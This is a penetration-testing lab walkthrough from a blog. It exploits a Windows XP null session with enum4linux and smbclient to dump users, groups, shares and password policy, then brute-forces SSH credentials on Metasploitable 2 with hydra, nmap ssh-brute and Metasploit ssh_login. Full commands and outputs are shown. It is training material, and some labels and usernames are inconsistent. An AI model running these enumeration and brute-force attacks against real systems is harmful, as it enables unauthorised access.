The final goal of the blog is to tell you how to retrieve information from the target machine such as shares, users, groups and so on! Moreover by navigating the remote machine, you should be able to find a file name "Congratulations.txt\". Download it and explore its content.

A windows share machine can share a file or a directory on the network; this lets local and remote users access the resources and, possible, modify it. Eliminate Your Fears And Doubts About Null Session Attack

Example

A file server in an office lets users open and edit the document of their own departement, while it lets everyone read but modify public information files.

This features is very useful in a network environment. The ability to share resources and files reduces redundancy and can improve work efficiency in a company.Shares can be either extremely useful if used properly or extremely dangerous when configured improperly.Creating network shares in a windows based environment is fairly easy. Generally uses just need to turn on the file and printer sharing services and then they can start using directories or files to share.

Users can also set permissions on a share showing who can perform operations such as reading and writing and modifying permissions. Starting from windows which the users can choose to share a single file or use the public directory when sharing a single file they can choose local or remote users to share the file with.When using the public directory they can choose which local users can access the files on the share but they can only allow everyone or no one in the network to access the share.




An authorised user can access share by using universal naming convention path (UNC path).


The Format of a UNC path is-

\\ServerName\ShareName\file.nat

Administrative shares

There are also some special default administrative shares which are used by system administrators and windows itself:

\\Computer Nmae\C$ lets and administrator access a volume on the local machine. Every volume has a share (C$, D$, E$, etc).

\\ComputerName\admin$ points to the windows installation directory.

\\ComputerName\ipc$ is used for inter-process communication. You cannot browse it via windows explorer.



You can test volume share and the admin$ share on your computer by entering the following on a windows explorer address bar


\\localhost\<sharename>

\\localhost\d$

 

Null session attacks can be used to enumerate write a lot of information. Attackers can steal information about-


# Passwords
# System Users
# System Group
# Running system processes


Null sessions remotely exploitable this means that attackers can use their computers to attack a vulnerable windows machine. Moreover, this can be used to call remotely API and remote procedure calls because of these factors Null session attack had a huge impact on windows ecosystem.

Nowadays is configured to be a immune from this kind of attack. However, legacy hosts can still be vulnerable.

A null session case and vulnerability for windows administrative shares, this lets an attacker and connect to a local or remote share without authentication.

We will go through the enumeration of windows shares and their exploitation by using various techniques and tools.

Tools

The best tools for this lab are:

# emun4linux
# samrdump
# smbclient

Steps

# Find a target in the network
# Check for null session
# Exploit null session

It\'s time to get our hands dirty.



# Gather information with enum4linux

Use enum4linux and gather the following information:

# Shares
# Users
# Password policies
# Groups



Use smbclient to navigate the target machine

Mount or use the smbclient interactive command line in order to navigate the remote machine and find and inspect the content of the Congratulations.txt file.

Find a target in the network

We first need to verify which the remote network is. We can do it by running ifconfig and checking the IP address of our tap0 interface.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2201  bytes 96326 (94.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2201  bytes 96326 (94.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.99.101  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 fe80::5044:42ff:fe4d:3eb6  prefixlen 64  scopeid 0x20<link>
        ether 52:44:42:4d:3e:b6  txqueuelen 1000  (Ethernet)
        RX packets 3  bytes 363 (363.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 522  bytes 22356 (21.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.98.25  netmask 255.255.255.0  broadcast 192.168.98.255
        inet6 2409:4064:95:e81b:3e1a:d593:a513:ecb9  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 92211  bytes 102634365 (97.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 55571  bytes 9521350 (9.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

As we can see the target network is 192.168.99.0/24 (note that your IP address may be different from the previous screenshot). Let\'s run nmap in order to discover alive hosts on the network: 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -sn 192.168.99.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-26 21:02 IST
Nmap scan report for 192.168.99.162
Host is up (0.53s latency).
MAC Address: 00:50:56:A5:DF:D7 (VMware)
Nmap scan report for 192.168.99.101
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 18.25 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

The previous screenshot shows that the only host alive on the network is 192.168.99.162 (besides our host: 192.168.99.20).

Check for null session

Let us target the host found in the previous step and check if it is vulnerable to null sessions. In the following screenshot, we are using enum4linux, but you can use any tool you prefer.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -n 192.168.99.162                                                                                                255 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.99.162    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.99.162    |
 ============================================== 
Looking up status of 192.168.99.162
        ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-A5-DF-D7

 ======================================= 
|    Session Check on 192.168.99.162    |
 ======================================= 
[+] Server 192.168.99.162 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.99.162    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Sun Dec 26 21:03:38 2021

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

We can see that the File Server Service is active and the string \<20> appears in the list.

Exploit null session

It is time to get our hands dirty!

Gather information with enum4linux

Let us try to gather as much information as we can. To do this we can simply run enum4linux with the -a switch:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -n 192.168.99.162                                                                                                255 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.99.162    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.99.162    |
 ============================================== 
Looking up status of 192.168.99.162
        ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-A5-DF-D7

 ======================================= 
|    Session Check on 192.168.99.162    |
 ======================================= 
[+] Server 192.168.99.162 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.99.162    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Sun Dec 26 21:03:38 2021

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -a 192.168.99.162
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:05:14 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.99.162    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.99.162    |
 ============================================== 
Looking up status of 192.168.99.162
        ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-A5-DF-D7

 ======================================= 
|    Session Check on 192.168.99.162    |
 ======================================= 
[+] Server 192.168.99.162 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.99.162    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================== 
|    OS information on 192.168.99.162    |
 ======================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.99.162 from smbclient: 
[+] Got OS info for 192.168.99.162 from srvinfo:
        192.168.99.162 Wk Sv NT PtB LMB     
        platform_id     :       500
        os version      :       5.1
        server type     :       0x51003

 =============================== 
|    Users on 192.168.99.162    |
 =============================== 
index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator    Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS      Name: (null)    Desc: (null)
index: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank    Name: Frank     Desc: (null)
index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest    Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant    Name: Remote Desktop Help Assistant Account     Desc: Account for Providing Remote Assistance
index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin  Desc: (null)
index: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0 Name: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US      Desc: This is a vendor's account for the Help and Support Service

user:[Administrator] rid:[0x1f4]
user:[eLS] rid:[0x3eb]
user:[Frank] rid:[0x3ed]
user:[Guest] rid:[0x1f5]
user:[HelpAssistant] rid:[0x3e8]
user:[netadmin] rid:[0x3ec]
user:[SUPPORT_388945a0] rid:[0x3ea]

 =========================================== 
|    Share Enumeration on 192.168.99.162    |
 =========================================== 

        Sharename       Type      Comment
        ---------       ----      -------
        My Documents    Disk      
        IPC$            IPC       Remote IPC
        Frank           Disk      
        C               Disk      
        WorkSharing     Disk      
        FrankDocs       Disk      
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------

[+] Attempting to map shares on 192.168.99.162
//192.168.99.162/IPC$   Mapping: OK     Listing: DENIED
//192.168.99.162/Frank  Mapping: OK     Listing: DENIED
//192.168.99.162/C      [E] Can't understand response:
  AUTOEXEC.BAT                        A        0  Fri Feb 13 06:20:47 2015
  boot.ini                           HS      211  Fri Feb 13 06:16:17 2015
  CONFIG.SYS                          A        0  Fri Feb 13 06:20:47 2015
  Documents and Settings              D        0  Wed Feb 18 14:55:58 2015
  IO.SYS                           AHSR        0  Fri Feb 13 06:20:47 2015
  MSDOS.SYS                        AHSR        0  Fri Feb 13 06:20:47 2015
  NTDETECT.COM                     AHSR    47564  Tue Aug  3 22:38:34 2004
  ntldr                            AHSR   250032  Tue Aug  3 22:59:34 2004
  pagefile.sys                      AHS 805306368  Thu Dec 23 22:59:58 2021
  Program Files                      DR        0  Mon Oct  3 21:40:27 2016
  System Volume Information         DHS        0  Fri Feb 13 06:24:12 2015
  WINDOWS                             D        0  Mon Oct  3 21:42:49 2016

                785224 blocks of size 4096. 345608 blocks available
//192.168.99.162/WorkSharing    Mapping: OK, Listing: OK
//192.168.99.162/FrankDocs      Mapping: OK     Listing: DENIED
//192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
//192.168.99.162/C$     Mapping: DENIED, Listing: N/A

 ====================================================== 
|    Password Policy Information for 192.168.99.162    |
 ====================================================== 


[+] Attaching to 192.168.99.162 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:192.168.99.162)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

        [+] ELS-WINXP
        [+] Builtin

[+] Password Info for Domain: ELS-WINXP

        [+] Minimum password length: None
        [+] Password history length: None
        [+] Maximum password age: 42 days 22 hours 47 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 ================================ 
|    Groups on 192.168.99.162    |
 ================================ 

[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Network Configuration Operators] rid:[0x22c]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]

[+] Getting builtin group memberships:
Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group 'Users' (RID: 545) has member: ELS-WINXP\netadmin
Group 'Users' (RID: 545) has member: ELS-WINXP\Frank
Group 'Guests' (RID: 546) has member: ELS-WINXP\Guest
Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator
Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS
Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin

[+] Getting local groups:
group:[HelpServicesGroup] rid:[0x3e9]

[+] Getting local group memberships:
Group 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\SUPPORT_388945a0

[+] Getting domain groups:
group:[None] rid:[0x201]

[+] Getting domain group memberships:
Group 'None' (RID: 513) has member: ELS-WINXP\Administrator
Group 'None' (RID: 513) has member: ELS-WINXP\Guest
Group 'None' (RID: 513) has member: ELS-WINXP\HelpAssistant
Group 'None' (RID: 513) has member: ELS-WINXP\SUPPORT_388945a0
Group 'None' (RID: 513) has member: ELS-WINXP\eLS
Group 'None' (RID: 513) has member: ELS-WINXP\netadmin
Group 'None' (RID: 513) has member: ELS-WINXP\Frank

 ========================================================================= 
|    Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-21-823518204-2025429265-839522115
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password ''

 =============================================== 
|    Getting printer info for 192.168.99.162    |
 =============================================== 
Cannot connect to server.  Error was NT_STATUS_NETWORK_UNREACHABLE


enum4linux complete on Sun Dec 26 22:35:32 2021

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

As we can see in the previous screenshots, we were able to gather a lot of information from the machine.

Use smbclient to navigate the target machine

A very useful tool that we can use to access remote shares and browse the remote machine is smbclient.

First let us get the list of shares using smbclient:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo smbclient -L WORKGROUP -I 192.168.99.162  -N -U ""

        Sharename       Type      Comment
        ---------       ----      -------
        My Documents    Disk      
        IPC$            IPC       Remote IPC
        Frank           Disk      
        C               Disk      
        WorkSharing     Disk      
        FrankDocs       Disk      
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

Let us now try to access the WorkSharing share and see what files are stored in there:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$                                                                                                                               1
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo smbclient \\\\192.168.99.162\\WorkSharing -N                                                                             1 ⨯
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Feb 18 16:37:31 2015
  ..                                  D        0  Wed Feb 18 16:37:31 2015
  Congratulations.txt                 A       66  Wed Feb 18 15:11:59 2015

                785224 blocks of size 4096. 345613 blocks available
smb: \> 
smb: \> get congratulations.txt /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt
getting file \congratulations.txt of size 66 as /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> 

As we can see in the previous screenshot there is a file namedCongratulations.txt. Let us download it into our machine and then use the cat command to display its content.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ cat congratulations.txt                     
Congratulations! You have successfully exploited a null session!
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

Disclaimer

Representation

You are a Penetration Tester hired by the company Hacking Truth to perform Password cracking/Brute Force tests on their internal Web Application and machines after knowing usernames and some kind of security test. You are asked to perform the penetration test on the client premises.

Brute Force and Password Cracking Live on Metasploitable 2 via three different tools

In this metasploitable2 environment, we get access to a Kali GUI instance. An SSH server can be accessed using the tools installed on Kali on virtual machine

Objective: Perform the following activities:

1. Find the password of user "msfadmin" using Hydra. Use password dictionary: //home/hackerboy/Desktop/Penetration-tester-jr/user.txt or rockyou.txt

2. Find the password of user "msfadmin" use appropriate Nmap script. Use password dictionary list bydefault: /usr/share/nmap/nselib/data/passwords.lst and the user list is here /home/hackerboy/Desktop/Penetration-tester-jr/user1.txt

3. Find the password of user "msfadmin" using the ssh_login Metasploit module. Use userpass dictionary: /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt

 

Tools

The best tools for this lab are:

# Metasploit Framework
# Hydra
# Nmap

Check the interfaces present on the Kali machine.

Command - ifconfig

 

 There are interface eth0 available and the ip is 192.168.6.45.

Using Hydra

Use Hydra to launch a dictionary attack on the SSH service for the "student" user.

Hydra

# Multi-threaded authentication brute force tool
# Supports numerous protocols, including FTP, HTTP, IMAP, IRC, LDAP, SSH, VNC, etc.
# Written in C


Hydra help option

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ hydra -h                                                                                       
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -r        use a non-random shuffling method for option -x
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode 
  -O        use old SSL v2 and v3
  -K        do not redo failed attempts (good for -M mass scanning)
  -q        do not print messages about connection errors
  -U        service module usage details
  -m OPT    options specific for a module, see -U output for information
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL v3.0. The newest version is always available at;
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)
These services were not compiled in: afp ncp oracle sapr3 smb2.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$                   

We are going to use wordlist /home/hackerboy/Desktop/Penetration-tester-jr/user.txt or rockyou.txt


Now, use the Hydra tool to launch the attack.



Command

hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45

-l
Login with a single username

-P
Load several passwords from the list

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45 
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-24 20:33:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries (l:1/p:13), ~1 try per task
[DATA] attacking ssh://192.168.6.45:22/
[22][ssh] host: 192.168.6.45   login: msfadmin   password: msfadmin
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-24 20:33:05
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$                                                                                                                            

The password for the msfadmin user is msfadmin.

Using Nmap Script


We will run ssh-brute Nmap script to find the password of the "administrator" user.

Password List to be used bydefault via nmap

/usr/share/john/password.lst


/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt

ssh-brute script

ssh-brute.nse is a Nmap script used to launch dictionary attacks on the SSH service.

This script takes a username and password list files. This is useful when the target username is not known to the attacker. However, in this case, we are already aware of the username i.e. "administrator". So, we will create a new file containing only this username.


Command


echo "msfadmin" > users1.txt

NOTE- msfadmin is our username



The password list is "/usr/share/nmap/nselib/data/passwords.lst".

We can now run the script,


Command

nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45 
[sudo] password for hackerboy: 
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-24 20:35 IST
NSE: [ssh-brute] Trying username/password pair: msfadmin:msfadmin
NSE: [ssh-brute] Trying username/password pair: msfadmin:
NSE: [ssh-brute] Trying username/password pair: msfadmin:123456
NSE: [ssh-brute] Trying username/password pair: msfadmin:12345
NSE: [ssh-brute] Trying username/password pair: msfadmin:123456789
Nmap scan report for 192.168.6.45
Host is up (0.00036s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-brute: 
|   Accounts: 
|     msfadmin:msfadmin - Valid credentials
|_  Statistics: Performed 5 guesses in 13 seconds, average tps: 0.4
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 23.21 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

The password of the "msfadmin" user is msfadmin

Using Metasploit

We can use

auxiliary/scanner/ssh/ssh_login

auxiliary module of the Metasploit framework to find the valid password for the "msfadmin" user.

ssh_login module

It is an auxiliary scanner module for ssh service in Metasploit. It also pops up an SSH shell on success.


Start msfconsole in quite mode using
-q
option


Command

msfconsole -q

Use the auxiliary/scanner/ssh/ssh_login module and set all required target details i.e RHOSTS, USERPASS_FILE, STOP_ON_SUCCESS, verbose etc.



Password List

/usr/share/wordlists/metasploit/root_userpass.txt or /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt

 

Command

use auxiliary/scanner/ssh/ssh_login
set RHOSTS demo.ine.local
set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
set STOP_ON_SUCCESS true
set verbose true
exploit



RHOSTS
: Target IP address

USERPASS_FILE
: Custom Username and Password file i.e user:pass


STOP_ON_SUCCESS
: If set to
true

-the operation stops after finding the working credentials


verbose
: If set to
true

-operation logs will be shown on console 

userpass.txt

msf6 >
msf6 > search ssh_login

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey

msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > 


msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.6.45
RHOSTS => 192.168.6.45
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
USERPASS_FILE => /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssh/ssh_login) > exploit

